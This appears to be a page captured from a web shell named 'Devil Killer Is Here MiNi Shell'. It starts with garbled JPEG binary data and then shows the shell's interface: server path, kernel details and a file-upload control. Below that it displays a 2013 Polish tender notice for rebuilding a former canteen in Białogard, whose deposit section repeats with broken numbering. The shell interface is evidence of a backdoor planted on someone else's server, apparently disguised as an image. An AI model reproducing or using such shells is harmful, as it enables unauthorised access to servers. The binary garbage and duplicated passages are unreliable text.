JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131105/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131105/449344-N-2013.html

<p class="kh_header"><b>Białogard: Przebudowa i zmiana sposobu użytkowania części B budynku tj. dawnej stołówki na cztery mieszkania i wyburzenie część A tj. dawnego zaplecza kuchennego  78-200 Białogard ul. Dąbrowszczaków 16  nr ewidencyjny działki 248/18 obręb 007 m. Białogard  zgodnie z projektem budowlanym, specyfikacją  wykonania i odbioru robót budowlanych oraz przedmiarem  robót i kosztorysem ofertowym.</b><br>
<b>Numer ogłoszenia: 449344 - 2013; data zamieszczenia: 05.11.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Białogardzkie Towarzystwo Budownictwa Społecznego Spółka z o.o. w Białogardzie , ul. Dąbrowszczaków 18, 78-200 Białogard, woj. zachodniopomorskie, tel. 094 3124426, 3129115, faks 094 3126444.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.tbs-bialogard.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Spółka prawa handlowego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa i zmiana sposobu użytkowania części B budynku tj. dawnej stołówki na cztery mieszkania i wyburzenie część A tj. dawnego zaplecza kuchennego  78-200 Białogard ul. Dąbrowszczaków 16  nr ewidencyjny działki 248/18 obręb 007 m. Białogard  zgodnie z projektem budowlanym, specyfikacją  wykonania i odbioru robót budowlanych oraz przedmiarem  robót i kosztorysem ofertowym..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Szczegółowy zakres przedmiotu zamówienia obejmuje: 
1.Obiekt posiada wewnętrzną ścianę  dzielącą budynek na  dwie części A i B. Układ konstrukcyjny budynku pozwala na oddzielenie części A od części B.
Rozbiórkę części A - prace rozbiórkowe obiektu A dawnego zaplecza kuchennego należy wykonać zgodnie z opisem zawrtym w części konstrukcyjnej budynku.
Likwidację ciepłociągu usytuowanego pod posadzką w części A ( przewidzianej do rozbiórki). Istniejący cieplociąg przewidziany do likwidacji zaopatruje aktualnie budynek mieszkalny (F) w cieplo z kotłowni (D). W ramach przebudowy zaprojektowano nowy odcinek sieci cieplnej do budynku F po terenie działek, na których jest on usytuowany tj. działki nr 248/17 i 248/2. Po dokonaniu rozbiórki cześci budynku (A) przebudowę odcinka ciepłociągu wykonać zgodnie z projektem branży sanitarnej.
W części B na poziomie parteru zaprojektowano do wykonania  cztery mieszkania  o powierzchni wymienionej jak na wstępie, natomiast na poziomie piwnic komórki lokatorskie. Zagospodarowanie terenu wykonano na obszarze związanym z planowanym  budynkiem mieszkalnym ( B). Zgodnie z projektem budowlanym zaprojektowano jedno wejście główne do budynku dostępne dla osób niepełnosprawnych.
Budynek murowany parterowy częściowo podpiwniczony o układzie podłużnym ścian nośnych, stropy belkowo- pustakowe ( Dz3), stropodach płaski. Posadowienie bezpośrednie na ławach żelbetowych. Lokalizacja w II strefie wiatrowej i I strefie śniegowej,kategoria geotechniczna I, głębokość przemarzania Hz=0,80m. Przed przystąpieniem do wykonywania robót budowlanych dotyczących części B zgodnie z projektem należy najpierw wykonać następujące prace rozbiórkowe dotyczące części A w całości i części B w zakresie niezbędnym do wykonania przebudowy obiektu:
1) usunąć wszystkie instalacje w budynku na poziomie parteru,
2) usunąć wszystkie okna i drzwi wraz z ościeżnicami i parapetami,
3) rozebrać ściany wewnętrzne przewidziane do rozbiórki zgodnie z oznaczeniami na rysunkach projektu,
 4)usunąć wszystkie okładziny ścian( płytki ceramiczne) i sufitów ( panele pcv),
5) usunąć wszystkie warstwy podłóg do poziomu nadbetonu stropu nad piwnicą, oraz dokładnie oczyścić  odsłoniętą powierzchnię i zabezpieczyć ją przed uszkodzeniem mechanicznym.
Dla wydzielenia poszczególnych mieszkań zaprojektowano celem wykonania ściany murowane z gazobetonu gr. 24 cm, które należy wykonać na stropie na odpowiednio przygotowanych żelbetowych podlewkach o gr. 5 cm. Podlewki wqykonać należy zgodnie z rysunkiem konstrukcyjnym K-3 na warstwie papy - paraizolacji.
Ścianki wykonać z gazobetonu odmiany minimum 500 na zaprawie klejowej lub na zaprawie cementowo- wapiennej marki 5 MPa. Część zaprojektowanych ścian działowych o gr. 12 cm przypadające na podciągach lub murowanych ścianach pełnych w piwnicy wykonać należy również z gazobetonu odmiany minimum 500 na zaprawie klejowej. Pozostałe ściany działowe w obrębie mieszkań zaprojektowano jako ściany działowe lekkie z płyt gipsowo- kartonowych na ruszcie z profiliiz blachy stalowej ocynkowanej o kształtach U oraz C.
W łazienkach i kuchniach należy stosować płyty GKBI ( wodoodporne) do pozostałych pomieszczeń płyty GKB ( zwykłe).
W miejscach mocowania urządzeń sanitarnych należy konstrukcję ścian dodatkowo wzmocnić. W otworach drzwiowych stosować ościeżnice metalowe uniwersalne kątowe duże do ścian kartonowo-gipsowaych. Przejścia przez ściany wykonać zgodniez instrukcją wybranego systemu. Na ścianach od strony kuchni( nad blatami kuchennymi) przewidzialnych do mocowania szafek wiszących należy zastosować podwójną warstwę płyt co  zwiększy możliwość ich obciążenia. Wszystkie ściany gipsowo-kartonowe wykonać na podłożu posadzkowym. 
 1.1.Fundamenty:
fundamenty istniejące żelbetowe bez zmian. Fundamenty dla schodów zewnętrznych według opisu i rysunków branży konstrukcyjnej projektu.
1.2. Strop:
Strop nad piwnicą to strop belkowo-pustakowe typu DZ3 do zachowania. Na podstawie projektu budowlanego przewiduje się usunąć wszystkie warstwy posadzkowe stropu do poziomu nadbetonu stropu i następnie wykonać nowe projektowane warstwy posadzkowe na stropie zgodnie z opisem B na rysunku  przekroju.
1.3.Stropodach:
Strop nad parterem to strop belkowo- pustakowy typu DZ-3 ułożony ze spadkiem jednokierunkowym. Do wykonania pokrycie dachowe papowe dwuwarstwowe- papa wierzchniego krycia z podsypką plus papa podkładowa. Opierzenia i rury spustowe wykonać z blachy stalowej ocynkowanej lub cynkowej i pozostawić w naturalnym kolorze. Od wewnątrz powierzchnię sufitów wykończyć tynkiem gipsowym.
1.4.Nadproża:  
Zgodnie z projektem przewiduje się obniżenie nadproży oraz wykonanie nadproży w innych miesjcach ustalonych przez zaprojektowany układ pomieszczeń mieskzlanych. Wszystkie nadproża należy wykonać zgodnie z opisem i rysunkami branży konstrukcyjnej projektu.

1.5. Schody i pochylnie:
Pomieszczenia mieszkalne( dawna stołówka) usytuowane są na poziomie 1,05m powyżej poziomu terenu. Przed wejściem zaprojektowano do wykonania  schody zewnętrzne wraz z platformą przychodowa zewnętrzną do transportu osób na wózkach inwalidzkich do wykonywanych mieszkań Platformaprowadzona na szynie metalowej ocynkowanej prostej mocowanej bezpośrednio do ściany betonowej. Schody zewnętrzne wykonać jako żelbetowe zgodnie z opisem i rysynkami branży konstrukcyjnej. Powierzchnię schodów i podestu obłożyć płytami okładzionowymi PBZ BS gr 4 cm o nawierzchni ze żwiru płukanego w kolorze szarym.. Płyty PBZ BS mrozoodporne o powierzchni antypoślizgowej i nieścieralnej na zaprawie cementowej. Balustradę schodów wykonać z gotowych elementów ze stali malowanej farbą proszkową. Powierzchnie boczne ( pionowe) schodów i ściany wykończyć tynkiem kamyczkowym w kolorze wg kolorystyki budynku.
 1.6. Posadzki:
Posadzki wykonać według opisów podanych w zestawieniu tabelarycznym pomieszczeń na rzucie parteru oraz według zestawienia przegród na przekroju A-A.
1.7. Hydroizolacje:
- izolacja pionowa ścian fundamentowych do wysokości listwy cokołowej- Dysperbit na zimno plus folia budowlana gruba osłaniająca styropian,
- posadzka na gruncie w piwnicy w części obniżonej 1 x papa SBS na zakład zgrzewana,
- posadzki na stropach w pomieszczeniach mokrych - bitumiczna papa termozgrzewalna na zakład oraz  folia PE polietylenowa po 25 cm wyciągnięta na ściany,
- pod wszystkimi opierzeniami w dachu z blachy stalowej ocynkowanej umieścić warstwę papy lub foli budowlanej,
- pod parapetami - 1 x papa,
- wzdłuż ścian budynku, gdzie bezpośrednio nie przylega chodnik wykonać opaskę żwirową zgodnie z opisem na przekroju A-A..
1.8. Ochrona cieplna budynku: 
Wszystkie przegrody zewnętrzne do ocieplenia warstwą styropianu zgodnie z Polską Normą PN-91/2020 Ochrona cieplna budynku. Wymagania i obliczenia.
Współczynnik przenikania ciepła dla okien max. 1,1 W(m2K)
Współczynnik przenikania ciepła dla drzwi wejściowych max 2,0W/(m2K)
Dodatkowe izolacje termiczne:
- murki w dachu - styropian  gr od 8 cm
-  stropodach od dołu przed wejściem - styropian gr 5-14 cm
1.9 Okna i drzwi:
Okna i drzwi według zestawienia na rys. nr A-6.
Okna z PCV szkolone podwójne szybą zespoloną ( Ukmax=1,3 W/(m2K). Wszystkie okna w pomieszczeniach z kanałami wywiewnymi wyposażyć w nawiewniki ciśnieniowe samoregulujące 2MO z okapem standardowym w kolorze jak okno tj. białe.
Parapety zewnętrzne w systemie i kolorze jak okna, parapety wewnętrzne z płyt parapetowych laminowanych. We wszystkich pomieszczeniach stosunek powierzchni okien liczone w świetle ościeżnic do powierzchni podłogi wynosi min. 0,125.
1.10. Wykończenie wewnętrzne i zewnętrzne ścian:
Przed przystąpieniem do wykańczania ścian, które zgodnie z projektem przewidziane  są do zachowania należy z ich powierzchni usunąć wszystkie okładziny tynki czy powłoki. Wszystkie nowe tynki należy wykonać na powierzchni gołej ściany. Malowanie ścian zewnętrznych zgodnie z projektem kolorystyki budynku rys. A-5. Na ścianach zewnętrznych ocieplonych metodą lekką, mokrą należy wykonać tynk cienkowarstwowy na siatce z włókna szklanego, baranek ziarno 1,5mm malowany farbą silikonowa. Ściany komunikacji ogólnej do wys. 2,00 m malowane farbą odporną na ścieranie i urazy  mechaniczne, lub zastosować tynk mozaikowy, powyżej farbą emulsyjną. W pomieszczeniach wc, łazienkach ściany do wysokości 2,10m wykończyć płytkami glazurowanymi, pozostałe fragmenty ścian pomalować farbami nieścieralnymi. Sufity tynki jak ściany malowane na kolor biały.
1.11.Rynny i opierzenia:
 Murki attyki do  opierzenia  blachą stalową ocynkowaną stosowaną do obróbek blacharskich zgodnie ze sztuką budowlaną. Rynny i rury spustowe do wykonania z materiału jak opierzenia dachu tj. z blachy stalowej ocynkowanej lub z PCV stosując wielkości podane na rysunkach w projekcie budowlanym.
1.12. Wentylacja:
W budynku winna być wentylacja wywiewno-nawiewna grawitacyjna, istniejące kanały wentylacyjne wywiewne murowane rozebrać i inne typu wywietrzaki stalowe usunąć. Nowe przewody wentylacyjne należy wykonać zgodnie z projektem budowlanym tj. w postaci wywietrzaków dachowych WDA150- daszki wywietrznikowe z rurą fi 150 mm. Rozmieszczenie projektowanych wywietrzaków na rysunku rzutu dachu.  Wszystkie okna należy wyposażyć w nawiewniki ciśnieniowe  samoregulujące 2MO z okapem standardowym zamontowane w górnej części ramy okna. W piwnicy wentylacja pomieszczeń poprzez zastosowanie ścian ażurowych pomiędzy komórkami lokatorskimi oraz umiesczenie otworów wewntylacyjnych ściennych. Otwory wentylacyjne ścienne o wymiarach 24/8 umieścić pod stropem piwnicy zgodniez oznaczeniem na rzucie piwnicy.
1.13.Wyposażenie instalacyjne budynku:
W budynku objętym przedmiotem zamówienia oraz  zgodnie z projektem budowlanym przewiduje się instalacje wewnętrzne:
- wewnętrzna instalacja wody zimnej i ciepłej,
- wewnętrzna instalacja kanalizacji sanitarnej,
- wewnętrzna instalacja centralnego ogrzewania,
- wewnętrzna instalacja elektryczna obejmująca instalację gniazd wtykowych, oświetlenia, telefoniczna , dzwonkowa i TV,
- wewnętrzna instalacja gazowa do kuchenek gazowych.
1.14 Sposób zapewnienia warunków niezbędnych do korzystania z obiektu przez osoby niepełnosprawne:
Przed wejściem zaprojektowano do wykonania schody zewnętrzne wraz z platformą przychodowa zewnętrzną do transportu osób na wózkach inwalidzkich. Platforma prowadzona na szynie metalowej ocynkowanej prostej mocowanej bezpośrednio do ściany betonowej. Drzwi wejściowe dwuskrzydłowe o minimalnej szerokości jednego skrzydła 90 cm i łącznej szerokości w świetle ościeżnicy 145 cm oraz drzwi wewnętrzne wejściowe do mieszkań zaprojektowano do wykonania o szerokości min. 90 c2.
2. Wykonawca zrealizuje zamówienie siłami własnymi lub z udziałem podwykonawców.
3. Zamawiający dopuszcza powierzenie podwykonawcom części prac, pod warunkiem wskazania zakresu prac w ofercie.
Wykonawca będzie ponosił pełną odpowiedzialność wobec Zamawiającego i osób trzecich za  roboty wykonane przez podwykonawców..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.21.13.41-1, 45.11.00.00-1, 45.31.00.00-3, 45.45.00.00-9, 45.45.00.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 6.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wymagania dotyczące wadium:
1) wadium należy wnieść przed upływem terminu składania ofert,
2) Oferta musi być zabezpieczona wadium w wysokości: 16.538,00zł (słownie: szesnaście tysięcy pięćset trzydzieści osiem złotych 00/100 ),
3) Termin  wniesienia wadium upływa dnia: 20 listopada 2013r   do  godz. 09:00,
4)  wadium obejmuje okres związania ofertą, tj.  30 dni, licząc od terminu składania ofert, o uznaniu przez  zamawiającego, że wadium w pieniądzu wniesiono w wymaganym terminie, decyduje data wpływu  środków na rachunek zamawiajacego.
5)  wadium może być wnoszone w jednej lub kilku następujących formach: 
a) pieniądzu,
b) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo- kredytowej, z tym że poręczenie jest zawsze poręczeniem pieniężnym,
c) gwarancjach bankowych, 
d) gwarancjach ubezpieczeniowych, 
e) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości  (Dz. U. Nr 109, poz.1158 z póżn. zm.),
W przypadku gwarancji bankowej lub ubezpieczeniowej niezbędnym jest przedłożenie pisemnej bezwarunkowej gwarancji udzielonej przez bank lub formę ubezpieczeniową ( oświadczenie), zgodnie z wymaganiami określonymi przez prawo bankowe.
6) W przypadku poręczenia niezbędnym jest złożenie przez poręczyciela oświadczenia pisemnego wobec wierzyciela.
7) Złożone poręczenie/ gwarancja musi zawierać:
a. termin obowiązywania gwarancji/ poręczenia do końca okresu związania ofertą,-
b. informację, że udzielona gwarancja/ poręczenie stanowi zabezpieczenie na wadium na rzecz zamawiającego,-
c. zobowiązanie zgodne z art. 46 ust. 5- ustawy z dnia 29 stycznia 2004r- Prawo zamówień publicznych:
8) wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy Zamawiającego Nr 34124036661111000043447691 z dopiskiem Wymagania dotyczące wadium:
6) wadium należy wnieść przed upływem terminu składania ofert,
7) Oferta musi być zabezpieczona wadium w wysokości: 16.538,00zł (słownie: szesnaście tysięcy pięćset trzydzieści osiem złotych 00/100 ),
8) Termin  wniesienia wadium upływa dnia: 20 listopada 2013r   do  godz. 09:00,
9)  wadium obejmuje okres związania ofertą, tj.  30 dni, licząc od terminu składania ofert, o uznaniu przez  zamawiającego, że wadium w pieniądzu wniesiono w wymaganym terminie, decyduje data wpływu  środków na rachunek zamawiajacego.
10)  wadium może być wnoszone w jednej lub kilku następujących formach: 
e) pieniądzu,
f) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo- kredytowej, z tym że poręczenie jest zawsze poręczeniem pieniężnym,
g) gwarancjach bankowych, 
h) gwarancjach ubezpieczeniowych, 
e) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości  (Dz. U. Nr 109, poz.1158 z póżn. zm.),
W przypadku gwarancji bankowej lub ubezpieczeniowej niezbędnym jest przedłożenie pisemnej bezwarunkowej gwarancji udzielonej przez bank lub formę ubezpieczeniową ( oświadczenie), zgodnie z wymaganiami określonymi przez prawo bankowe.
6) W przypadku poręczenia niezbędnym jest złożenie przez poręczyciela oświadczenia pisemnego wobec wierzyciela.
7) Złożone poręczenie/ gwarancja musi zawierać:
a. termin obowiązywania gwarancji/ poręczenia do końca okresu związania ofertą,-
b. informację, że udzielona gwarancja/ poręczenie stanowi zabezpieczenie na wadium na rzecz zamawiającego,-
c. zobowiązanie zgodne z art. 46 ust. 5- ustawy z dnia 29 stycznia 2004r- Prawo zamówień publicznych:
8) wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy Zamawiającego Nr 34124036661111000043447691 z dopiskiem  wadium - przetarg na przebudowę i zmianę sposobu użytkowania  częśći B budynku tj. dawnej stolówki na cztery mieszkania i wyburzenie część A tj. dawnego zaplecza kuchennego  przy ul. Dąbrowszczaków 16  nr dz. ew. 248/18 obręb 007 w Białogardzie.  
 9) Wadium wnoszone w innej formie niż pieniężnej składa się w Dziale Technicznym pokój nr 105 I piętro siedziby   Zamawiającego przy ul. Dąbrowszczaków 18 w Białogardzie.. 
Wadium wniesione w pieniądzu zamawiający przechowuje na rachunku bankowym,
10 ) Zamawiający dokona zwrotu wadium zgodnie z warunkami określonymi w art. 46 ustawy  a zatrzymuje w oparciu o art. 46 ust. 4a i ust.5 od pkt 1) do pkt 3) ustawy z dnia 29 stycznia 2004r - Prawo zamówień publicznych ( Dz.U.z 2010r. Nr 113, poz. 759 ze zmianami).
 wadium - przetarg na przebudowę i zmianę sposobu użytkowania  częśći B budynku tj. dawnej stolówki na cztery mieszkania i wyburzenie część A tj. dawnego zaplecza kuchennego  przy ul. Dąbrfowszczaków 16  nr dz. ew. 248/18 obręb 007 w Białogardzie.  
 9) Wadium wnoszone w innej formie niż pieniężnej składa się w Dziale Technicznym pokój nr 105 I piętro siedziby   Zamawiającego przy ul. Dąbrowszczaków 18 w Białogardzie.. 
Wadium wniesione w pieniądzu zamawiający przechowuje na rachunku bankowym,
10 ) Zamawiający dokona zwrotu wadium zgodnie z warunkami określonymi w art. 46 ustawy  a zatrzymuje w oparciu o art. 46 ust. 4a i ust.5 od pkt 1) do pkt 3) ustawy z dnia 29 stycznia 2004r - Prawo zamówień publicznych ( Dz.U.z 2010r. Nr 113, poz. 759 ze zmianami).</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli wykonawca wykaże : dysponowaniem  odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia: za spełnienie warunku dotyczącego dysponowania osobami zdolnymi do wykonania zamówienia zamawiający uzna dysponowanie osobami posiadającymi ważne uprawnienia budowlane w zakresie kierowania robotami budowlanymi w specjalności konstrukcyjno- budowlanej, instalacyjnej i elektrycznej oraz sanitarnej i innymi zaświadczeniami w zakresie budownictwa itp.  zgodnie z § 62 ust 4 Prawo Budowlane Osoba ta musi posiadać aktualne zaświadczenia stwierdzające członkostwo w Polskiej Izbie Inżynierów Budownictwa.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>-- wymagane jest wykazanie wykonania w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie, co najmniej dwie roboty budowlane polegające na budowie, przebudowie, adaptacji obiektu na lokale mieszkalne itp. obejmujące budowle ( obiekty) o wartości netto minimum odpowiadającej wartości przedmiotu zamówienia każda, wraz z dokumentami potwierdzającymi, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.
Zamawiający uzna warunek za spełniony, jeżeli wykonawca złoży  oświadczenie o spełnieniu tego warunku</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca złoży oświadczenie o spełnianiu tego warunku.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.
Zamawiający uzna warunek za spełniony, jeżeli Wykonawca złoży oświadczenie o spełnianiu tego warunku.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- wymagane jest posiadanie ubezpieczenia od  odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia,-
- wymagane jest posiadanie środków finansowych  w wysokości co najmniej w wartości przedmiotu zamówienia lub zdolności kredytowej w wysokości  tej samej.
- wymagane jest dysponowanie następującymi wskaźnikami:
 wskaźnikiem okresu spłaty zobowiązań odpowiednio za: ostatnie 3 lata i bieżący rok a jeżeli okres prowadzenia działalności jest krótszy- za ten okres- wartość maksymalna 90 dni,-
 wskaźnikiem płynności bieżącej odpowiednio za: ostatnie 3 lata i bieżący rok, jeżeli okres prowadzenia działalności jest krótszy- za ten okres.
Zamawiający uzna warunek za spełniony, jeżeli Wykonawca złoży oświadczenie o spełnieniu tego warunku.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

